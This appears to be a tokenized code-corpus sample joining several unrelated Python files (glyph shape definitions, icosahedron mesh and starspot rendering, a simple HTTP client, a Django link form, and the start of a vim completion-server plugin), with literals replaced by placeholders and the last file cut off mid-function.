width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:1>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:2>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:3>' ] = shape <EOL> shape = triangle ( - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:4>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:5>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - scale_y ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = reflect_x ( reflect_y ( _glyphs [ '<STR_LIT>' ] , <NUM_LIT:0.5> ) , _glyphs [ '<STR_LIT>' ] . width / <NUM_LIT:2> ) <EOL> shape . width = _glyphs [ '<STR_LIT>' ] . width <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) - scale_x ( circle ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> ) , <NUM_LIT:0.5> , <NUM_LIT> ** <NUM_LIT:0.5> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:0>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0.> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:+>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:/>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:?>' ] = shape <EOL> del shape </s>
<s> import numpy as np <EOL> def make_isocosahedron ( ) : <EOL> g = ( <NUM_LIT:1.> + np . sqrt ( <NUM_LIT:5> ) ) / <NUM_LIT> <EOL> v = np . array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , g ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , g ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - g ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , - g ] , <EOL> [ <NUM_LIT:1> , g , <NUM_LIT:0> ] , <EOL> [ - <NUM_LIT:1> , g , <NUM_LIT:0> ] , <EOL> [ - <NUM_LIT:1> , - g , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , - g , <NUM_LIT:0> ] , <EOL> [ g , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ g , <NUM_LIT:0> , - <NUM_LIT:1> ] , <EOL> [ - g , <NUM_LIT:0> , - <NUM_LIT:1> ] , <EOL> [ - g , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> f = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT:11> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:6> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:7> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:0> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:2> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:8> , <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:4> , <NUM_LIT:9> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT:3> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:10> ] , <EOL> [ <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:2> ] <EOL> ] ) <EOL> return ( f , v ) <EOL> def np_to_verts ( p ) : <EOL> x = np . ndarray . tolist ( p [ : , <NUM_LIT:0> ] ) <EOL> y = np . ndarray . tolist ( p [ : , <NUM_LIT:1> ] ) <EOL> z = np . ndarray . 
tolist ( p [ : , <NUM_LIT:2> ] ) <EOL> verts = [ zip ( x , y , z ) ] <EOL> return ( verts ) <EOL> def get_vertex_ind ( vert , point ) : <EOL> delta = np . sum ( np . power ( point - vert , <NUM_LIT> ) , axis = <NUM_LIT:1> ) <EOL> anydup = np . isclose ( delta , <NUM_LIT:0> ) <EOL> if np . any ( anydup ) : <EOL> return ( vert , np . ravel ( np . where ( anydup ) ) ) <EOL> else : <EOL> vert = np . append ( vert , [ point ] , axis = <NUM_LIT:0> ) <EOL> return ( vert , vert . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) <EOL> def normalise_vertices ( v ) : <EOL> vs = v * v <EOL> vssum = np . power ( np . sum ( vs , axis = <NUM_LIT:1> ) , <NUM_LIT:0.5> ) <EOL> vn = v / vssum [ : , np . newaxis ] <EOL> return ( vn ) <EOL> def normit ( x ) : <EOL> nx = x / np . linalg . norm ( x , axis = <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> return ( nx ) <EOL> def split_iso ( fa , ve ) : <EOL> newface = np . empty ( ( <NUM_LIT:0> , <NUM_LIT:3> ) , dtype = int ) <EOL> for face in fa : <EOL> ip0 , ip1 , ip2 = face <EOL> p0 = ve [ ip0 ] <EOL> p1 = ve [ ip1 ] <EOL> p2 = ve [ ip2 ] <EOL> ( ve , ip3 ) = get_vertex_ind ( ve , ( p0 + p1 ) / <NUM_LIT> ) <EOL> ( ve , ip4 ) = get_vertex_ind ( ve , ( p1 + p2 ) / <NUM_LIT> ) <EOL> ( ve , ip5 ) = get_vertex_ind ( ve , ( p2 + p0 ) / <NUM_LIT> ) <EOL> newface = np . append ( newface , np . array ( [ [ ip0 , ip3 , ip5 ] , [ ip5 , ip3 , ip4 ] , [ ip3 , ip1 , ip4 ] , [ ip5 , ip4 , ip2 ] ] ) , axis = <NUM_LIT:0> ) <EOL> ven = normalise_vertices ( ve ) <EOL> return ( newface , ven ) <EOL> def sigmoid ( x ) : <EOL> '<STR_LIT>' <EOL> result = <NUM_LIT:1.> / ( <NUM_LIT:1.> + np . exp ( - x ) ) <EOL> return ( result ) <EOL> def starspot ( cosang , spotsize , angwid ) : <EOL> angle = np . arccos ( cosang ) * <NUM_LIT> / np . pi <EOL> tang = ( angle - spotsize ) / angwid <EOL> return ( sigmoid ( tang ) ) <EOL> def vec2sph ( vec ) : <EOL> theta = np . arcsin ( vec [ : , <NUM_LIT:0> ] ) <EOL> lambd = np . 
arctan2 ( vec [ : , <NUM_LIT:1> ] , vec [ : , <NUM_LIT:0> ] ) <EOL> return ( theta , lambd ) <EOL> def sph2vec ( theta , lambd ) : <EOL> xx = np . cos ( theta ) * np . cos ( lambd ) <EOL> yy = np . cos ( theta ) * np . sin ( lambd ) <EOL> zz = np . sin ( theta ) <EOL> return ( np . hstack ( ( xx , yy , zz ) ) ) <EOL> def intriangle ( tup , p1 , p2 , p3 ) : <EOL> '<STR_LIT>' <EOL> x , y = tup <EOL> x1 = p1 [ <NUM_LIT:0> ] <EOL> x2 = p2 [ <NUM_LIT:0> ] <EOL> x3 = p3 [ <NUM_LIT:0> ] <EOL> y1 = p1 [ <NUM_LIT:1> ] <EOL> y2 = p2 [ <NUM_LIT:1> ] <EOL> y3 = p3 [ <NUM_LIT:1> ] <EOL> a = ( ( y2 - y3 ) * ( x - x3 ) + ( x3 - x2 ) * ( y - y3 ) ) / ( ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) ) <EOL> b = ( ( y3 - y1 ) * ( x - x3 ) + ( x1 - x3 ) * ( y - y3 ) ) / ( ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) ) <EOL> c = <NUM_LIT:1> - a - b <EOL> T = ( a >= <NUM_LIT:0> ) & ( a <= <NUM_LIT:1> ) & ( b >= <NUM_LIT:0> ) & ( b <= <NUM_LIT:1> ) & ( c >= <NUM_LIT:0> ) & ( c <= <NUM_LIT:1> ) <EOL> tupout = ( x [ T ] , y [ T ] ) <EOL> return ( tupout ) <EOL> def triangle_image ( tup , p1 , p2 , p3 ) : <EOL> '<STR_LIT>' <EOL> y , x = tup <EOL> x1 = p1 [ <NUM_LIT:0> ] <EOL> x2 = p2 [ <NUM_LIT:0> ] <EOL> x3 = p3 [ <NUM_LIT:0> ] <EOL> y1 = p1 [ <NUM_LIT:1> ] <EOL> y2 = p2 [ <NUM_LIT:1> ] <EOL> y3 = p3 [ <NUM_LIT:1> ] <EOL> aden = ( y2 - y3 ) * ( x - x3 ) + ( x3 - x2 ) * ( y - y3 ) <EOL> adiv = ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) <EOL> bden = ( y3 - y1 ) * ( x - x3 ) + ( x1 - x3 ) * ( y - y3 ) <EOL> bdiv = ( y2 - y3 ) * ( x1 - x3 ) + ( x3 - x2 ) * ( y1 - y3 ) <EOL> if np . isclose ( adiv , <NUM_LIT:0.> ) : <EOL> a = <NUM_LIT:0.> <EOL> else : <EOL> a = aden / adiv <EOL> if np . 
isclose ( bdiv , <NUM_LIT:0.> ) : <EOL> b = <NUM_LIT:0.> <EOL> else : <EOL> b = bden / bdiv <EOL> c = <NUM_LIT:1> - a - b <EOL> T = ( a >= <NUM_LIT:0> ) & ( a <= <NUM_LIT:1> ) & ( b >= <NUM_LIT:0> ) & ( b <= <NUM_LIT:1> ) & ( c >= <NUM_LIT:0> ) & ( c <= <NUM_LIT:1> ) <EOL> return ( T ) <EOL> def rotx ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , ct , - st ] , <EOL> [ <NUM_LIT:0> , st , ct ] ] ) <EOL> return ( m ) <EOL> def roty ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ ct , <NUM_LIT:0> , st ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ - st , <NUM_LIT:0> , ct ] ] ) <EOL> return ( m ) <EOL> def rotz ( theta ) : <EOL> t = theta * np . pi / <NUM_LIT> <EOL> ct = np . cos ( t ) <EOL> st = np . sin ( t ) <EOL> m = np . array ( [ [ ct , - st , <NUM_LIT:0> ] , <EOL> [ st , ct , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> return ( m ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from mpl_toolkits . mplot3d import Axes3D <EOL> from mpl_toolkits . mplot3d . art3d import Poly3DCollection <EOL> import matplotlib . pyplot as plt <EOL> import matplotlib as mpl <EOL> mpl . rc ( '<STR_LIT:image>' , interpolation = '<STR_LIT>' , origin = '<STR_LIT>' , cmap = '<STR_LIT>' ) <EOL> mpl . rc ( '<STR_LIT>' , limits = ( - <NUM_LIT:7> , <NUM_LIT:7> ) ) <EOL> fig = plt . figure ( ) <EOL> ax = Axes3D ( fig ) <EOL> ( fa , ve ) = make_isocosahedron ( ) <EOL> ve = normalise_vertices ( ve ) <EOL> print '<STR_LIT>' % ( fa . shape [ <NUM_LIT:0> ] , ve . shape [ <NUM_LIT:0> ] ) <EOL> ( fa2 , ve2 ) = split_iso ( fa , ve ) <EOL> print '<STR_LIT>' % ( fa2 . shape [ <NUM_LIT:0> ] , ve2 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa3 , ve3 ) = split_iso ( fa2 , ve2 ) <EOL> print '<STR_LIT>' % ( fa3 . 
shape [ <NUM_LIT:0> ] , ve3 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa4 , ve4 ) = split_iso ( fa3 , ve3 ) <EOL> print '<STR_LIT>' % ( fa4 . shape [ <NUM_LIT:0> ] , ve4 . shape [ <NUM_LIT:0> ] ) <EOL> ( fa5 , ve5 ) = split_iso ( fa4 , ve4 ) <EOL> print '<STR_LIT>' % ( fa5 . shape [ <NUM_LIT:0> ] , ve5 . shape [ <NUM_LIT:0> ] ) <EOL> ax . scatter ( ve [ : , <NUM_LIT:0> ] , ve [ : , <NUM_LIT:1> ] , ve [ : , <NUM_LIT:2> ] ) <EOL> ve3 = normalise_vertices ( ve3 ) <EOL> fa3_mean = np . mean ( ( ve3 [ fa3 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_3 = np . abs ( fa3_mean ) <EOL> ve4 = normalise_vertices ( ve4 ) <EOL> fa4_mean = np . mean ( ( ve4 [ fa4 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_4 = np . abs ( fa4_mean ) <EOL> ve5 = normalise_vertices ( ve5 ) <EOL> fa5_mean = np . mean ( ( ve5 [ fa5 ] ) , axis = <NUM_LIT:1> ) <EOL> facols_5 = np . abs ( fa5_mean ) <EOL> for ( face , facol ) in zip ( fa4 , facols_4 ) : <EOL> ax . add_collection3d ( Poly3DCollection ( np_to_verts ( ve4 [ face ] ) , color = facol ) ) <EOL> bdir1 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] ) <EOL> bdir2 = np . array ( [ [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> n_bdir1 = normit ( bdir1 ) <EOL> n_bdir2 = normit ( bdir2 ) <EOL> n_fa5_mean = normit ( fa5_mean ) <EOL> ang1 = np . dot ( n_fa5_mean , n_bdir1 . T ) <EOL> ang2 = np . dot ( n_fa5_mean , n_bdir2 . T ) <EOL> cspot = starspot ( ang1 , <NUM_LIT> , <NUM_LIT> ) * starspot ( ang2 , <NUM_LIT:20> , <NUM_LIT:1.> ) <EOL> def fillstar2d ( im , tup , face , vert , tricol ) : <EOL> '<STR_LIT>' <EOL> for ( fa , col ) in zip ( face , tricol ) : <EOL> intri = triangle_image ( tup , vert [ fa [ <NUM_LIT:0> ] ] , vert [ fa [ <NUM_LIT:1> ] ] , vert [ fa [ <NUM_LIT:2> ] ] ) <EOL> im [ intri ] = im [ intri ] + col <EOL> return ( im ) <EOL> ty , tx = np . mgrid [ - <NUM_LIT> : <NUM_LIT> : <NUM_LIT> , - <NUM_LIT> : <NUM_LIT> : <NUM_LIT> ] <EOL> im0 = np . zeros ( ( ty . shape [ <NUM_LIT:0> ] , ty . 
shape [ <NUM_LIT:1> ] , <NUM_LIT:3> ) ) <EOL> intens = facols_3 <EOL> zplus = ( fa3_mean [ : , <NUM_LIT:2> ] > <NUM_LIT:0> ) <EOL> fa3_zplus = fa3 [ zplus ] <EOL> f = fillstar2d ( im0 , ( ty , tx ) , fa3_zplus , ve3 , intens [ zplus ] ) <EOL> fig = plt . figure ( ) <EOL> ax = plt . subplot ( <NUM_LIT> ) <EOL> plt . imshow ( f ) <EOL> fig = plt . figure ( ) <EOL> ax = Axes3D ( fig ) <EOL> for ( face , facol ) in zip ( fa3_zplus , facols_3 [ zplus ] ) : <EOL> ax . add_collection3d ( Poly3DCollection ( np_to_verts ( ve3 [ face ] ) , color = facol ) ) <EOL> plt . show ( ) <EOL> plt . draw ( ) <EOL> raw_input ( '<STR_LIT>' ) </s>
<s> import urlparse <EOL> import httplib <EOL> DEFAULT_TIMEOUT = None <EOL> def _validate_url ( url ) : <EOL> p = urlparse . urlsplit ( url ) <EOL> if p . scheme != '<STR_LIT:http>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> host = p . netloc <EOL> path = p . path <EOL> if p . query != '<STR_LIT>' : <EOL> path += "<STR_LIT:?>" + p . query <EOL> return host , path <EOL> def get ( url , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> conn . request ( '<STR_LIT:GET>' , path , body = None ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def put ( url , data , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> head = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> conn . request ( '<STR_LIT>' , path , data , head ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def post ( url , data , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> head = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> conn . request ( '<STR_LIT:POST>' , path , data , head ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data <EOL> def delete ( url , timeout = DEFAULT_TIMEOUT ) : <EOL> host , path = _validate_url ( url ) <EOL> conn = httplib . HTTPConnection ( host , timeout = timeout ) <EOL> conn . request ( '<STR_LIT>' , path , body = None ) <EOL> resp = conn . getresponse ( ) <EOL> data = resp . read ( ) <EOL> conn . close ( ) <EOL> return resp . status , resp . reason , data </s>
<s> import re <EOL> from importlib import import_module <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . forms import CharField , ChoiceField , Textarea <EOL> from django . forms . models import ModelForm <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from . models import StyledLink , STYLEDLINK_MODELS <EOL> class StyledLinkForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = StyledLink <EOL> fields = ( <EOL> '<STR_LIT:label>' , <EOL> '<STR_LIT:title>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ext_destination = CharField ( <EOL> required = False , <EOL> widget = Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT> , } ) , <EOL> help_text = _ ( '<STR_LIT>' ) <EOL> ) <EOL> try : <EOL> from easy_select2 . widgets import Select2 <EOL> int_destination = ChoiceField ( <EOL> required = False , <EOL> help_text = _ ( '<STR_LIT>' ) , <EOL> widget = Select2 ( select2attrs = { '<STR_LIT:width>' : '<STR_LIT>' } ) , <EOL> ) <EOL> except : <EOL> int_destination = ChoiceField ( <EOL> required = False , <EOL> help_text = _ ( '<STR_LIT>' ) , <EOL> ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( StyledLinkForm , self ) . __init__ ( * args , ** kwargs ) <EOL> available_objects = [ ] <EOL> for item in STYLEDLINK_MODELS : <EOL> if '<STR_LIT:type>' in item : <EOL> model = item [ '<STR_LIT:type>' ] <EOL> else : <EOL> model = item [ '<STR_LIT>' ] <EOL> parts = item [ '<STR_LIT>' ] . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> cls = getattr ( import_module ( parts [ <NUM_LIT:0> ] ) , parts [ <NUM_LIT:1> ] ) <EOL> queryset = cls . objects <EOL> if '<STR_LIT>' in item : <EOL> queryset = getattr ( queryset , item [ '<STR_LIT>' ] ) ( ) <EOL> if '<STR_LIT>' in item : <EOL> for ( k , v ) in item [ '<STR_LIT>' ] . 
items ( ) : <EOL> try : <EOL> item [ '<STR_LIT>' ] [ k ] = v ( ) <EOL> except TypeError : <EOL> pass <EOL> queryset = queryset . filter ( ** item [ '<STR_LIT>' ] ) <EOL> else : <EOL> if not '<STR_LIT>' in item : <EOL> queryset = queryset . all ( ) <EOL> if '<STR_LIT>' in item : <EOL> queryset = queryset . order_by ( item [ '<STR_LIT>' ] ) <EOL> available_objects . append ( { <EOL> '<STR_LIT>' : model , <EOL> '<STR_LIT>' : list ( queryset ) , <EOL> } ) <EOL> object_choices = [ ] <EOL> object_choices . append ( ( "<STR_LIT>" , "<STR_LIT>" , ) ) <EOL> for group in sorted ( available_objects ) : <EOL> obj_list = [ ] <EOL> for obj in group [ '<STR_LIT>' ] : <EOL> type_class = ContentType . objects . get_for_model ( obj . __class__ ) <EOL> type_id = type_class . id <EOL> obj_id = obj . id <EOL> form_value = "<STR_LIT>" % ( type_id , obj_id ) <EOL> display_text = str ( obj ) <EOL> obj_list . append ( ( form_value , display_text ) ) <EOL> object_choices . append ( ( group [ '<STR_LIT>' ] , obj_list , ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = object_choices <EOL> if self . instance . int_destination : <EOL> type_class = ContentType . objects . get_for_model ( self . instance . int_destination . __class__ ) <EOL> type_id = type_class . id <EOL> obj_id = self . instance . int_destination . id <EOL> current_value = "<STR_LIT>" % ( type_id , obj_id ) <EOL> self . fields [ '<STR_LIT>' ] . initial = current_value <EOL> def save ( self , * args , ** kwargs ) : <EOL> try : <EOL> object_string = self . cleaned_data [ '<STR_LIT>' ] <EOL> matches = re . match ( "<STR_LIT>" , object_string ) . groups ( ) <EOL> object_type_id = matches [ <NUM_LIT:0> ] <EOL> object_id = matches [ <NUM_LIT:1> ] <EOL> object_type = ContentType . objects . get ( id = object_type_id ) <EOL> self . cleaned_data [ '<STR_LIT>' ] = object_type_id <EOL> self . cleaned_data [ '<STR_LIT>' ] = object_id <EOL> self . instance . int_destination_id = object_id <EOL> self . instance . 
int_destination_type = object_type <EOL> except : <EOL> self . cleaned_data [ '<STR_LIT>' ] = None <EOL> self . cleaned_data [ '<STR_LIT>' ] = None <EOL> self . instance . int_destination_id = None <EOL> self . instance . int_destination_type = None <EOL> return super ( StyledLinkForm , self ) . save ( * args , ** kwargs ) </s>
<s> import vim <EOL> from os import path <EOL> import json <EOL> import subprocess <EOL> import time <EOL> import re <EOL> import socket <EOL> server_addr = vim . eval ( '<STR_LIT>' ) <EOL> server_command = vim . eval ( '<STR_LIT>' ) <EOL> cli = vim . eval ( '<STR_LIT>' ) <EOL> composer = vim . eval ( '<STR_LIT>' ) <EOL> timeout = float ( vim . eval ( '<STR_LIT>' ) ) <EOL> padawanPath = path . join ( path . dirname ( __file__ ) , '<STR_LIT:..>' ) <EOL> BUFFER_SIZE = <NUM_LIT> <EOL> class Server : <EOL> def __init__ ( self ) : <EOL> fullAddr = server_addr . split ( "<STR_LIT::>" ) <EOL> self . addr = ( <EOL> fullAddr [ <NUM_LIT:0> ] , <EOL> int ( fullAddr [ <NUM_LIT:1> ] ) <EOL> ) <EOL> def start ( self ) : <EOL> command = '<STR_LIT>' . format ( <EOL> server_command , <EOL> padawanPath <EOL> ) <EOL> subprocess . Popen ( <EOL> command , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT <EOL> ) <EOL> self . socket = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> def stop ( self ) : <EOL> try : <EOL> self . sendRequest ( '<STR_LIT>' , { } ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> def restart ( self ) : <EOL> if self . stop ( ) : <EOL> self . start ( ) <EOL> def sendRequest ( self , command , params ) : <EOL> s = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> s . connect ( self . addr ) <EOL> s . setsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY , <NUM_LIT:1> ) <EOL> requestData = json . dumps ( { <EOL> '<STR_LIT>' : command , <EOL> '<STR_LIT>' : params <EOL> } ) <EOL> s . send ( requestData ) <EOL> response = "<STR_LIT>" <EOL> while 